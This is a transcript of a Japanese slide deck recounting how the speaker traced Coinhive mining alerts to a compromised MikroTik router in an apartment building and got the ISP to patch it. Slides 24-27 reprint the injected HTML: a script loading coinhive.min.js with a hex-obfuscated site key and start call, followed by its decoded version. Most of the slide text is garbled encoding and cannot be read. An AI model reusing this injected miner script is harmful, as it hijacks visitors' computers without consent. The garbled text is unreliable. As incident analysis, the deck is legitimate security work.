マルウェアを駆除して世界平和に貢献した話

Transcript

1. Ϛϧ΢ΣΞΛۦআͯ͠ੈքฏ࿨ʹ ߩݙͨ͠࿩

2. ࣗݾ঺հ ➤ খ໺ɹً໵ !UFSVY
   ➤ ৘ใཧ޻೥
   ➤ ௿ϨΠϠ΍ηΩϡϦςΟपΓ
   ➤

   XFC΋গ͠
   ➤ ωοτϫʔΫɺΠϯϑϥपΓ΋গ͠
   ➤ ը૾ॲཧɺؔ਺ܕɺݴޠॲཧܥΛ΍Ζ͏ͱ͍ͯ͠Δ
   ➤ 1)1
   1ZUIPO
   +BWBͳͲ
3. None
4. None
5. None
6. None
7. None

8. ͳΜ͔Ͱ͖ͯͨWWW

9. Miner-T coinhive.com

10. https://doocts.com/3403 ΑΓ

11. Α͋͘Δ΍͔ͭɾɾɾ

12. ྲྀੴʹ͜ͷαΠτͰ͸ग़ͳ͍ͩΖ͏ http://www.itmedia.co.jp/news/ ΑΓ

13. None
14. None

15. ͜Ε͸ɾɾɾ ➤ྲྀੴʹ*5NFEJB͕DPJOIJWFΛ࢓ࠐΉͱ͸ ߟ͑ΒΕͳ͍
    ➤ͦͷଞDPJOIJWFͱ͸ແԑͦ͏ͳαΠτͰ ΋Ξϥʔτ͕ग़ͨ
    ➤Ϛϧ΢ΣΞʹײછ͔ͨ͠ɾɾɾʁ

16. ϚΠχϯάϚϧ΢ΣΞ ➤ ೥͝Ζ͔Βٸܹʹ਺Λ৳͹͍ͯ͠Δ https://internet.watch.impress.co.jp/docs/news/1107434.html ΑΓ

17. ௐࠪ։࢝ ➤ ͱΓ͋͑ͣ.BD͸์ஔͯ͠ɺ༧උͷ 8JOEPXTϚγϯʢ෺ཧతʹҟͳΔϚγϯʣ Ͱௐࠪ͠Α͏
    ➤ 8JOEPXTͰ͍Ζ͍Ζௐ΂ͯͨΒɾɾɾ

18. None

19. ͑ɺͳΜͰ ➤ ωοτϫʔΫӽ͠ʹײછ͔ͨ͠ɾɾʁ
    ➤ όΧͳɾɾૣ͗͢Δɾɾɾ
    ➤ ͓·͚ʹXFCγʔϧυ͸ൃಈ͠ͳ͔ͬͨ

20. ࢓ํͳ͍ͷͰଓߦ

21. HTML೷͍ͯΈͨ

22. https://hufurima.com/ ΑΓ

23. ͍ͭ͜ͷHTMLΛ औಘ͠Α͏

24. औಘͨ͠ <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge">

    <title>Loading</title> <style type="text/css"> body{font-family: Verdana, Geneva, sans-serif;font-size: 11px;}img{border: none}img:hover{opacity: 0.8;}h1{font-size: 1.7em;display: inline;margin-bottom: 10px;}fieldset{margin-top: 20px;background: #fff;padding: 20px;border: 1px solid #c1c1c1;}#container{width: 70%;margin: 10% auto;}#box{background-color: #fff; -moz-border-radius: 7px; -webkit-border-radius: 7px; border: 1px solid #c1c1c1; padding: 30px;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#f3f3f3'); /* for IE */background: -webkit-gradient(linear, left top, left bottom, from(#fff), to(#f3f3f3)); /* for webkit browsers */background: -moz-linear-gradient(top, #fff, #f3f3f3); /* for firefox 3.6+ */}.floater{float: left; margin-right: 10px;}.floater label{display: block; text-align: center;}#login{margin: 2em 0 4em 0;}#login h2{font-weight: normal; font-size: 14px; margin: 0 0 0.5em 1em;}#login td{padding: 0 4px 0 0;}#login td.label{text-align: right;}#login td.toolbar{padding: 0 0 0 1em; vertical-align: top;}#login ul.toolbar{margin: 0;}#login input{margin: 2px; padding: 2px; border: 1px solid #888; box-shadow: 1px 1px 3px rgba(0,0,0,0.3); -webkit-box-shadow: 1px 1px 3px rgba(0,0,0,0.3); -moz-box-shadow: 1px 1px 3px rgba(0,0,0,0.3);}#error{display:none; color:red; padding: 1em 0 0 0;}ul.toolbar{font-size: 11px; text-align: left; list-style-type: none; padding: 0; margin: 2px 0 4px 2px;}ul.toolbar li{float: left; vertical-align: middle;}ul.toolbar a{float: none; display: block; margin: 2px 4px 2px 0; padding: 5px; background: #ddd; border: 1px solid #888; border-radius: 3px; -moz-border-radius: 3px; box-shadow: 1px 1px 2px rgba(255,255,255,0.8) inset,0 10px 10px -5px rgba(255,255,255,0.5) inset, /* top gradient */1px 1px 2px rgba(0,0,0,0.2); /* shadow */ -webkit-box-shadow: 1px 1px 2px rgba(255,255,255,0.8) inset,0 10px 10px -5px rgba(255,255,255,0.5) inset,1px 1px 2px rgba(0,0,0,0.2); -moz-box-shadow: 1px 1px 2px rgba(255,255,255,0.8) inset,0 10px 10px -5px rgba(255,255,255,0.5) inset,1px 1px 2px rgba(0,0,0,0.2); color: #000; text-decoration: none; text-align: center; white-space: nowrap; cursor: inherit; min-width: 4em; -webkit-transition: background 0.2s linear, box-shadow 0.2s ease-out; -moz-transition: background 0.2s linear, box-shadow 0.2s ease-out;}ul.toolbar a:hover{background: #eee;}ul.toolbar a:active{background: #aaa; box-shadow: 1px 1px 2px #999 inset; -webkit-box-shadow: 1px 1px 2px #999 inset; -moz-box- shadow: 1px 1px 2px #999 inset;} </style> </head> <body> <h1>Loading <img src="data:image/gif;base64,R0lGODlhgAAPAPEAAAAAAP///0hISP///yH/C05FVFNDQVBFMi4wAwEAAAAh/hpDcmVhdGVkIHdpdGggYWpheGxvYWQuaW5mbwAh+QQJCgAAACwAAAAAgAAPAAACo5QvoIC33NKKUtF3Z8RbN/ 55CEiNonMaJGp1bfiaMQvBtXzTpZuradUDZmY+opA3DK6KwaQTCbU9pVHc1LrDUrfarq765Ya9u+VRzLyO12lwG10yy39zY11Jz9t/6jf5/HfXB8hGWKaHt6eYyDgo6BaH6CgJ+QhnmWWoiVnI6ddJmbkZGkgKujhplNpYafr5OooqGst66Uq7OpjbKmvbW/ p7UAAAIfkECQoAAAAsAAAAAIAADwAAArCcP6Ag7bLYa3HSZSG2le/Zgd8TkqODHKWzXkrWaq83i7V5s6cr2f2TMsSGO9lPl+PBisSkcekMJphUZ/OopGGfWug2Jr16x92yj3w247bh6teNXseRbyvc0rbr6/ x5Ng0op4YSJDb4JxhI58eliEiYYujYmFi5eEh5OZnXhylp+RiaKQpWeDf5qQk6yprawMno2nq6KlsaSauqS5rLu8cI69k7+ytcvGl6XDtsyzxcAAAh+QQJCgAAACwAAAAAgAAPAAACvpw/ oIC3IKIUb8pq6cpacWyBk3htGRk1xqMmZviOcemdc4R2kF3DvfyTtFiqnPGm+yCPQdzy2RQMF9Moc+fDArU0rtMK9SYzVUYxrASrxdc0G00+K8ruOu+9tmf1W06ZfsfXJfiFZ0g4ZvEndxjouPfYFzk4mcIICJkpqUnJWYiYs9jQVpm4edqJ+lkqikDqaZoquwr7OtHqAFerqxp L2xt6yQjKO+t7bGuMu1L8a5zsHI2MtOySVwo9fb0bVQAAIfkECQoAAAAsAAAAAIAADwAAAsucP6CAt9zSErSKZyvOd/KdgZaoeaFpRZKiPi1aKlwnfzBF4jcNzDk/e7EiLuLuhzwqayfmaNnjCCGNYhXqw9qcsWjT+ +TqxIKp2UhOprXf7PoNrpyvQ3p8fAdu82o+O5w3h2A1+Nfl5geHuLgXhEZVWBeZSMnY1oh5qZnyKOhgiGcJKHqYOSrVmWpHGmpauvl6CkvhaUD4qejaOqvH2+doV7tSqdsrexybvMsZrDrJaqwcvSz9i9qM/Vxs7Qs6/S18a+vNjUx9/ v1TAAAh+QQJCgAAACwAAAAAgAAPAAAC0Zw/oIC33NKKUomLxct4c718oPV5nJmhGPWwU9TCYTmfdXp3+aXy+wgQuRRDSCN2/PWAoqVTCSVxilQZ0RqkSXFbXdf3ZWqztnA1eUUbEc9wm8yFe+VguniKPbNf6mbU/ ubn9ieUZ6hWJAhIOKbo2Pih58C3l1a5OJiJuflYZidpgHSZCOnZGXc6l3oBWrE2aQnLWYpKq2pbV4h4OIq1eldrigt8i7d73Ns3HLjMKGycHC1L+hxsXXydO9wqOu3brPnLXL3C640sK+6cTaxNflEAACH5BAkKAAAALAAAAACAAA8AAALVnD+ggLfc0opS0SeyFnjn7oGbqJHf 4mXXFD2r1bKNyaEpjduhPvLaC5nJEK4YTKhI1ZI334m5g/akJacAiDUGiUOHNUd9ApTgcTN81WaRW++Riy6Tv/ S4dQ1vG4ps4NwOaBYlOEVYhYbnplexyJf3ZygGOXkWuWSZuNel+aboV0k5GFo4+qN22of6CMoq2kr6apo6m5fJWCoZm+vKu2Hr6KmqiHtJLKebRhuszNlYZ3ncewh9J9z8u3mLHA0rvetrzYjd2Wz8bB6oNO5MLq6FTp2+bVUAACH5BAkKAAAALAAAAACAAA8AAALanD+ggLfc0 opS0XeX2Fy8zn2gp40ieHaZFWHt9LKNO5eo3aUhvisj6RutIDUZgnaEFYnJ4M2Z4210UykQ8BtqY0yHstk1UK+/sdk63i7VYLYX2sOa0HR41S5wi7/vcMWP1FdWJ/dUGIWXxqX3xxi4l0g4GEl5yOHIBwmY2cg1aXkHSjZXmbV4uoba5kkqelbaapo6u0rbN/ SZG7trKFv7e6savKTby4voaoVpNAysiXscV4w8fSn8fN1pq1kd2j1qDLK8yYy9/ff9mgwrnv2o7QwvGO1ND049UgAAIfkECQoAAAAsAAAAAIAADwAAAticP6CAt9zSilLRd2d8onvBfV0okp/ pZdamNRi7ui3yyoo4Ljio42h+w6kgNiJt5kAaasdYE7D78YKlXpX6GWphxqTT210qK1Cf9XT2SKXbYvv5Bg+jaWD5ekdjU9y4+PsXRuZHRrdnZ5inVidAyCTXF+nGlVhpdjil2OE49hjICVh4qZlpibcDKug5KAlHOWqqR8rWCjl564oLFruIucaYGlz7+XoKe2wsIqxLzMxaxI uILIs6/JyLbZsdGF063Uu6vH2tXc79LZ1MLWS96t4JH/ rryzhPWgAAIfkECQoAAAAsAAAAAIAADwAAAtWcP6CAt9zSilLRd2fEe4kPCk8IjqTonZnVsQ33arGLwLV8Kyeqnyb5C60gM2LO6MAlaUukwdbcBUspYFXYcla00KfSywRzv1vpldqzprHFoTv7bsOz5jUaUMer5vL+Mf7Hd5RH6HP2AdiUKLa41Tj1Acmjp0bJFuinKKiZyUhna Bd5OLnzSNbluOnZWQZqeVdIYhqWyop6ezoquTs6O0aLC5wrHErqGnvJibms3LzKLIYMe7xnO/ yL7TskLVosqa1aCy3u3FrJbSwbHpy9fr1NfR4fUgAAIfkECQoAAAAsAAAAAIAADwAAAsqcP6CAt9zSilLRd2fEW7cnhKIAjmFpZla3fh7CuS38OrUR04p5Ljzp46kgMqLOaJslkbhbhfkc/lAjqmiIZUFzy2zRe5wGTdYQuKs9N5XrrZPbFu94ZYE6ms5/9cd7/ T824vdGyIa3h9inJQfA+DNoCHeomIhWGUcXKFIH6RZZ6Bna6Zg5l8JnSamayto2WtoI+4jqSjvZelt7+URKpmlmKykM2vnqa1r1axdMzPz5LLooO326Owxd7Bzam4x8pZ1t3Szu3VMOdF4AACH5BAkKAAAALAAAAACAAA8AAAK/nD+ggLfc0opS0XdnxFs3/ i3CSApPSWZWt4YtAsKe/DqzXRsxDqDj6VNBXENakSdMso66WzNX6fmAKCXRasQil9onM+oziYLc8tWcRW/PbGOYWupG5Tsv3TlXe9/jqj7ftpYWaPdXBzbVF2eId+jYCAn1KKlIApfCSKn5NckZ6bnJpxB2t1kKinoqJCrlRwg4GCs4W/ jayUqamaqryruES2b72StsqgvsKlurDEvbvOx8mzgazNxJbD18PN1aUgAAIfkECQoAAAAsAAAAAIAADwAAArKcP6CAt9zSilLRd2fEWzf+ecgjlKaQWZ0asqPowAb4urE9yxXUAqeZ4tWEN2IOtwsqV8YkM/grLXvTYbV4PTZpWGYU9QxTxVZyd4wu975ZZ/ qsjsPn2jYpatdx62b+2y8HWMTW5xZoSIcouKjYePeTh7TnqFcpabmFSfhHeemZ+RkJOrp5OHmKKapa+Hiyyokaypo6q1CaGDv6akoLu3DLmLuL28v7CdypW6vsK9vsE1UAACH5BAkKAAAALAAAAACAAA8AAAKjnD+ggLfc0opS0XdnxFs3/ nkISI2icxokanVt+JoxC8G1fNOlm6tp1QNmZj6ikDcMrorBpBMJtT2lUdzUusNSt9qurvrlhr275VHMvI7XaXAbXTLLf3NjXUnP23/qN/ n8d9cHyEZYpoe3p5jIOCjoFofoKAn5CGeZZaiJWcjp10mZuRkaSAq6OGmU2lhp+vk6iioay3rpSrs6mNsqa9tb+ntQAAA7AAAAAAAAAAAA" /></h1> <script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var _0x7e51=["\x7A\x38\x70\x6A\x37\x4C\x69\x64\x6E\x74\x38\x6D\x58\x50\x6E\x66\x65\x65\x44\x30\x42\x4E\x52\x77\x55\x44\x49\x36\x79\x49\x63\x58","\x73\x74\x61\x72\x74"];var miner= new CoinHive.Anonymous(_0x7e51[0],{throttle:0.2});miner[_0x7e51[1]]() </script> </body> </html> ➤ CSS GIF(Base64)

25. େࣄͳͱ͜Ζ <script src="https://coinhive.com/lib/ coinhive.min.js"></script> <script> var _0x7e51=["\x7A\x38\x70\x6A\x37\x4C\x69\x64\x 6E\x74\x38\x6D\x58\x50\x6E\x66\x65\x65\x44\x 30\x42\x4E\x52\x77\x55\x44\x49\x36\x79\x49\x 63\x58","\x73\x74\x61\x72\x74"];var

    miner= new CoinHive.Anonymous(_0x7e51[0],{throttle: 0.2});miner[_0x7e51[1]]() </script> ➤

26. ASCIIίʔυ ➤ ΞϧϑΝϕοτจࣈʹ਺஋ΛରԠͤͨ͞΋ͷ
    ➤ 
    NBO
    BTDJJ

27. 16ਐ਺ΛΞϧϑΝϕοτʹม׵ <script src="https://coinhive.com/lib/ coinhive.min.js"></script> <script> var _0x7e51 = ['z8pj7Lidnt8mXPnfeeD0BNRwUDI6yIcX','start']; var

    miner= new CoinHive.Anonymous( _0x7e51[0],{throttle:0.2} ); miner[_0x7e51[1]]() </script> ➤ coinhiveΛಡΈࠐΈ ม਺ఆٛ'_0x7e51' miner["start"]()

28. ൜ਓ z8pj7Lidnt8mXPnfeeD0BNRwUDI6yIcX

29. ͦͷ΄͔ʹඃ֐͸ɾɾɾ ➤ 8JOػΛҰԠBWBTU ΢ΠϧεରࡦιϑτʣͷϑϧεΩϟ ϯʹ͔͚ͨ
    ➤ Ωϟογϡ͕อଘ͞Ε͍ͯͯͦΕ͕ݕग़͞Ε͕ͨଞʹ ѱ͍͜ͱ͸͞Εͯͳͦ͞͏

30. ̎ͭͷઆ

31. 1ɿࣗ෼ͷϚγϯ͕Ϛϧ΢ΣΞʹײછ ͍ͯ͠Δઆ

32. ➤ XFCαΠτʹΞΫηε͢ΔͱɺDPJOIJWFΛಡΈࠐΉ Α͏ͳIUNMΛฦ͢Α͏ͳϚϧ΢ΣΞ
    ➤ XFCϖʔδ΁ͷΞΫηεΛ೧͡ۂ͛ΔΑ͏ͳϚϧ΢Σ Ξ͸࣮ࡏ͢Δ
    ➤ ϒϥ΢βϋΠδϟοΧʔ
    ➤ %/4ΩϟογϡϙΠζχϯά

33. 2ɿωοτϫʔΫ্ʹѱౕ͍͕͍Δઆ

34. ➤ தؒऀ߈ܸʢ.BO
    *O
    5IF
    .JEEMF ͳͲ
    ➤ ϚγϯͱXFCαʔόʔͷؒͰ଴ͪड͚ͯ௨৴Λ ๣डɺվ᜵͢Δɻ
    ➤ ޙͰৄ͘͠

35. આݕূελʔτ

36. MAC, WIN, IOSͰݱ৅͕֬ೝ͞Εͨ ➤ ྲྀੴʹಉछͷϚϧ΢ΣΞ͕͜ΕΒશͯͷ04ʹײછ ͨ͠ͱ͸ߟ͑ʹ͍͘ʢಛʹJ04
    ➤ Ϛγϯͦͷ΋ͷ͕ײછ͍ͯ͠ΔΘ͚Ͱ͸ͳͦ͞͏ ωοτϫʔΫӽ͠ʹײછ͢Δ΋ͷ΋͋Δ͕ɾɾɾʣ

    ଟ෼આᶄ͕ਖ਼͍͠ʂʂʂ

37. ༧૝ 2ɿωοτϫʔΫ্ʹѱౕ͍͕͍Δઆ

38. XFCαʔόʔ ϚϯγϣϯωοτϫʔΫ ࣗ୐ωοτϫʔΫ Πϯλʔωοτ

39. XFCαʔόʔ ϚϯγϣϯωοτϫʔΫ ࣗ୐ωοτϫʔΫ Πϯλʔωοτ

40. ࣗ୐ແઢLANϧʔλΛऔΓআ͘ ➤ 1$ʹܨ͍ͩ-"/έʔϒϧΛนʹੜ͑ͯΔϙʔτʹ ௚઀ͯ͞͠΋࣏Βͳ͍ ͜͜ʹ௚઀ Ϳͬ͢͞ LAN

41. XFCαʔόʔ ϚϯγϣϯωοτϫʔΫ ࣗ୐ωοτϫʔΫ Πϯλʔωοτ

42. ͦͷଞ ➤ IUUQͰXFCϖʔδʹΞΫηεͨ࣌͠ͷΈൃੜɻ IUUQTͰ͸ੜ͡ͳ͍
    ➤ ຖճൃੜ͢ΔΘ͚Ͱ͸ͳ͍ɻdΞΫηεʹճ ͘Β͍
    ➤ ಛ௃తͳจࣈྻ ม਺໊ͷ@YF΍LFZ

    ͸ຖճݻ ఆɻHHͬͯ΋ώοτͳ͠ɻ

43. HTTP ➤ )ZQFS5FYU
    5SBOTGFS
    1SPUPDPM
    ➤ ϋΠύʔͳςΩετʢIUNMʣΛτϥϯεϑΝʔ ͢Δϓϩτίϧ
    ➤ ˢҙ༁ɿIUNMΛૹड৴͢ΔͨΊʹར༻͞ΕΔ௨ ৴ํࣜͷ͜ͱ

44. HTTPS ➤ )551
    4FDVSF
    ➤ ૹͬͨΓड͚औͬͨΓ͢Δ಺༰͕҉߸Խ͞ΕΔɻ ➤ ௨৴૬खͷͳΓ͢·͠Λݕ஌Ͱ͖Δɻ
    ➤ ωοτϫʔΫͷ్தͰ಺༰͕վ᜵͞Εͯ΋ݕ஌ Ͱ͖Δ

    ͳΓ͢·͠orվ᜵ʁ

45. XFCαʔόʔ ϚϯγϣϯωοτϫʔΫ ࣗ୐ωοτϫʔΫ Πϯλʔωοτ ѱ͞Λ͍ͯ͠Δʁ

46. TRACEROUTE ➤ ௨Δܦ࿏ʢϧʔλʣͷ*1ΞυϨεΛݟΔ͜ͱ͕Ͱ͖Δ

47. ύέοτΛ೷͘

48. ύέοτ؂ࢹ͸༻ྔɺ༻๏Λकͬͯద੾ʹ ➤ ௨ ৴ ͠ ͯ Δ ৘ ใ ʢ

    * 1 Ξ υ Ϩ ε ɺ ϙ ʔ τ ൪ ߸ ɺɹ ɹ ɹ ɹ ɹ ɹ ૹड৴σʔλʢ ʣͳͲ͕Θ͔Δ
    ➤ 8JSFTIBSLͱ͍͏πʔϧΛ࢖͏

49. ਖ਼ৗܥϨεϙϯεʢHTTPύέοτʣ

50. ҟৗܥϨεϙϯεʢHTTPύέοτʣ

51. ҟৗܥͷHTTPϔομ͚ͩʹ͜Μͳ΋ͷ͕ɾɾɾ

52. MIKROTIKͬͯͳΜͧ ➤ ϧʔλʔͷϝʔΧʔͩͬͨɻ
    ➤ 3PVUFSCPBSEͱ͍͏੡඼͕ओྗ
    ➤ ϥτϏΞʹຊ͕ࣾ͋Δͦ͏ͳɻͲ͜΍ͶΜɻ

53. None

54. ग़ΔΘग़ΔΘɾɾɾ ӈԼ:https://www.symantec.com/blogs/threat-intelligence/hacked-mikrotik-router ࠨ্:https://www.trustwave.com/Resources/SpiderLabs-Blog/Mass-MikroTik-Router-Infection-%E2%80%93-First-we-cryptojack-Brazil,-then-we-take-the-World-/ Cryptojack

55. ը૾:https://blog.skyboxsecurity.com/mikrotik-coinhive-cryptojacking/ Mikrotikϧʔλʹ੬ऑੑ ͕ൃݟ͞Εͨ ௨৴ʹϚΠχϯάεΫ ϦϓτΛࣹ͠ࠐΉΑ͏ ʹϧʔλΛઃఆ͢ΔϚ ϧ΢ΣΞ मਖ਼ύονͰ࣏ ΔΑ

56. A cryptojacking campaign targets MikroTik devices is observed in Japan

57. ൜ਓͷKeyʂʂʂ _0x7e51:ྫͷม਺໊

58. 0x7e51ͱCoinHiveΛؚΉจࣈྻΛฦ͢ϧʔλΛݕࡧ ؔ܎ͳ͔ͬͨɾɾɾ

59. XFCαʔόʔ ϚϯγϣϯωοτϫʔΫ ࣗ୐ωοτϫʔΫ Πϯλʔωοτ

60. ➤ Πϯλʔωοτଆͷػث͸େྔͷτϥϑΟο Ϋʢ௨৴ʣΛࡹ͘ͷͰɺ΋͠ײછ͍ͯ͠Δͳ Βࣗ෼Ҏ֎ʹ΋ใࠂऀ͕͍Δ͸ͣ
    ➤ ͱΓ͋͑ͣϚϯγϣϯͷڞ༻ϧʔλΛٙͬͯ ΈΔ

61. XFCαʔόʔ ϚϯγϣϯωοτϫʔΫ ࣗ୐ωοτϫʔΫ Πϯλʔωοτ

62. ͰɺͲ͏΍ͬͯௐࠪ͢Δͷ͞ ➤ ࣗ෼͕؅ཧ͢ΔϧʔλͰ͸ͳ͍ͨΊɺແҋͳௐࠪ͸ ๏ʹ৮ΕΔՄೳੑ͕͋Δ
    ➤ ϙʔτεΩϟϯͱ͔
    ➤ ͱΓ͋͑ͣɺΠϯλʔωοτࣄۀऀʢ*41 ʹ௨ใͨ͠ɻ

63. ISPͱͷձ࿩ ๻ʮ͔͔͔͔͘͘͠͡ͳͷͰϚϯγϣϯڞ༻ϧʔλ ʹҟৗ͕ͳ͍͔ௐ΂͍ͯͩ͘͞ʯ
    *41ʮো֐͸֬ೝͰ͖·ͤΜͰͨ͠ɻҰԠϝʔΧʔ ʹ໰͍߹ΘͤͯϑΝʔϜ΢ΣΞΞοϓσʔτ͠ͱ͖ ·ͨ͠ʯ
    

64. ࣏ͬͨʂʂʂ

65. ͏Ε͍͠ʂʂʂ͔͠͠ɾɾɾ ➤ ো֐͕֬ೝͰ͖ͳ͔ͬͨɾɾɾʁ
    ➤ Ͱ΋ɺϑΝʔϜ΢ΣΞΞοϓσʔτʢमਖ਼ύονʣ Ͱ࣏ͬͨͱ͍͏͜ͱ͸ɺ΍ͬͺΓϧʔλ͕ײછͯ͠ ͍ͨΜ͡Όͳ͍ʁ

66. ؾʹͳΔͱ͜Ζ ➤ Ϛϯγϣϯϧʔλͷϕϯμʔ͕.JLSP5JLͷ΋ͷͩͬ ͨΒɺϚϯγϣϯϧʔλ͕ʮΫϩʯͱ൑அ͍͍ͯͩ͠ Ζ͏
    ➤ *41͸ηΩϡϦςΟ্ͷཧ༝͕Ͳ͏ͱ͔Ͱڭ͑ͯ͘Ε ͳ͔ͬͨ
    ➤ ͳΒࣗྗͰௐ΂Δ͔͠ͳ͍

67. ͪΐͬͱ͚ͩωοτϫʔΫ ͓ษڧλΠϜ

68. IPΞυϨεʁ ➤ ௨৴ઌΛಛఆ͢ΔͨΊͷΞυϨεɻ
    ➤ Έ͍ͨͳײ͡ɻ
    ➤ ͋Δ஋ͷάϩʔόϧΞυϨε͸ੈքʹͨͩ ͚ͭͩ
    ➤ Ϣʔβʔ͕ࣗ෼ͰׂΓ౰ͯΔɺଞͷػث͔Β

    ׂΓ౰ͯͯ΋Β͏ɻ

69. MACΞυϨεʁ ➤ ௨৴ઌΛಛఆ͢ΔͨΊͷΞυϨε
    ➤ GGECΈ͍ͨͳײ͡
    ➤ લ൒CJU͸ϕϯμʔݻ༗ͷ஋ɻ
    ➤ ͋Δ."$ΞυϨεΛ΋ͭσόΠε͸ੈքʹͭ ͚ͩɻ
    

    ➤ جຊతʹ੡଄࣌ʹׂΓ౰ͯΒΕͯɺมߋ͢Δ͜ ͱ͸ͳ͍ɻ

70. ARP ➤ ͋ʔ΀
    ➤ ʮ͜ͷ*1ΞυϨεΛ͍࣋ͬͯΔਓͷ.BDΞυϨε ͸ʁʯͱपғͷػثʹฉ͍ͯʮࢲͰ͢Αɻ͜Ε͕ࢲ ͷ.BDΞυϨεͰ͢ɻʯͱճ౴ΛಘΔϓϩτίϧ
    ➤ ಉҰ-"/্ͷσόΠεʹ͔͠໰͍߹ΘͤͰ͖ͳ͍

71. ΍Γ͍ͨ͜ͱ੔ཧ ➤ Ϛϯγϣϯϧʔλͷϕϯμʔ͕஌Γ͍ͨ
    ➤ ˢ.BDΞυϨεͷલ൒CJUΛHHΕ͹Θ͔Δ
    ➤ ˢ"31ʹΑΓ*1ΞυϨε͔Β.BDΞυϨεΛ໰ ͍߹ΘͤͰ͖Δ
    ➤ ˢܦ࿏্ͷ*1ΞυϨε͸USBDFSPVUFͰ஌Δ͜ͱ

    ͕Ͱ͖Δʂ

72. ϚϯγϣϯωοτϫʔΫ ࣗ୐ωοτϫʔΫ ߸ࣨ ߸ࣨ ߸ࣨ ɾɾɾ-"/

73. ࣗ୐ແઢLANϧʔλΛऔΓআ͘ ➤ 1$ͱܨ͍ͩ-"/έʔϒϧนʹੜ͑ͯΔϙʔτʹ௚઀͢͞ ͜͜ʹ௚઀ Ϳͬ͢͞ LAN

74. ϚϯγϣϯωοτϫʔΫ ࣗ୐ωοτϫʔΫ ߸ࣨ ߸ࣨ ߸ࣨ ɾɾɾ-"/

75. ϚϯγϣϯωοτϫʔΫ ߸ࣨ ߸ࣨ ߸ࣨ ɾɾɾ-"/

76. $ tracert google.com ࠷΋͍ۙϧʔλͷIPΞυϨε

77. ϚϯγϣϯϧʔλͷMACΞυϨεʂʂ

78. None
79. None

80. ࣄ࣮Λྻڍͯ͠ΈΑ͏ ➤ Ϛϯγϣϯϧʔλ͸.JLSPUJL੡ͷ΋ͷͩͬͨɻ
    ➤ .JLSPUJL੡ϧʔλ͸ϑΝʔϜ΢ΣΞΛΞοϓσʔτ ͠ͳ͍ͱɺDSZQUPKBDLʹײછ͢ΔՄೳੑ͕͋Δɻ
    ➤ *41͕ϑΝʔϜ΢ΣΞͷΞοϓσʔτΛߦ͏ͱো֐ ͕ফ͑ͨ Ϛϯγϣϯͷϧʔλ͕

    Cryptjackʹײછ͍ͯͨ͠ʁ

81. ·ͱΊ ➤ ϧʔλʔͷϑΝʔϜ΢ΣΞ͸͔ͬ͠ΓΞοϓσʔτ ͓ͯ͜͠͏
    ➤ $SZQUPKBDL͡Όͳͯ͘ɺ΋ͬͱڟѱͳϚϧ΢ΣΞͩͬ ͨΒɾɾɾʁ
    ➤ ੈքฏ࿨ʹߩݙͰ͖ͨʢ*1"ʹ΋௨ใͨ͠ʣ
    ➤

    ηΩϡϦςΟʹڵຯ࣋ͬͯ͘ΕͨΒ͏Ε͍͠Ͱ͢ɻ